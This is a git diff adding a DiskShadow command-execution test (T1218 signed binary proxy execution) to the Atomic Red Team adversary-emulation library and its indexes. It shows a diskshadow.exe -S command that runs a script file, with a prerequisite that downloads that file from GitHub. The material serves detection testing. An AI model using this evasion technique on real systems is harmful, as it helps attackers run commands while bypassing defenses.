diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index bb209354..9b28813f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -564,6 +564,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c40f8cf5..5dfbd0e6 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -385,6 +385,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6caebcb5..c91d60ec 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -886,6 +886,7 @@
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
+ - Atomic Test #9: DiskShadow Command Execution [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 310417c2..b46f9cd0 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -632,6 +632,7 @@
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
+ - Atomic Test #9: DiskShadow Command Execution [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index c5c476fe..a788ce12 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -37523,6 +37523,43 @@ defense-evasion:
command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
-ModulePath #{module_path}'
name: powershell
+ - name: DiskShadow Command Execution
+ auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+ description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
+ on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ txt_payload:
+ description: txt to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\T1218.txt
+ dspath:
+ description: Default location of DiskShadow.exe
+ type: Path
+ default: C:\Windows\System32\diskshadow.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: txt file must exist on disk at specified location (#{txt_payload})
+ prereq_command: 'if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+ - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+ prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
+
+'
+ executor:
+ command: "#{dspath} -S #{txt_payload} \n"
+ name: powershell
+ elevation_required: false
T1216:
technique:
id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 1c51311f..2ff65d71 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -20,6 +20,8 @@
- [Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test](#atomic-test-8---invoke-athremotefxvgpudisablementcommand-base-test)
+- [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution)
+
@@ -392,4 +394,60 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+
+
+
+## Atomic Test #9 - DiskShadow Command Execution
+Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| txt_payload | txt to execute | Path | PathToAtomicsFolder\T1218\src\T1218.txt|
+| dspath | Default location of DiskShadow.exe | Path | C:\Windows\System32\diskshadow.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+#{dspath} -S #{txt_payload}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: txt file must exist on disk at specified location (#{txt_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+```
+##### Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dspath}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+echo "DiskShadow.exe not found on disk at expected location"
+```
+
+
+
+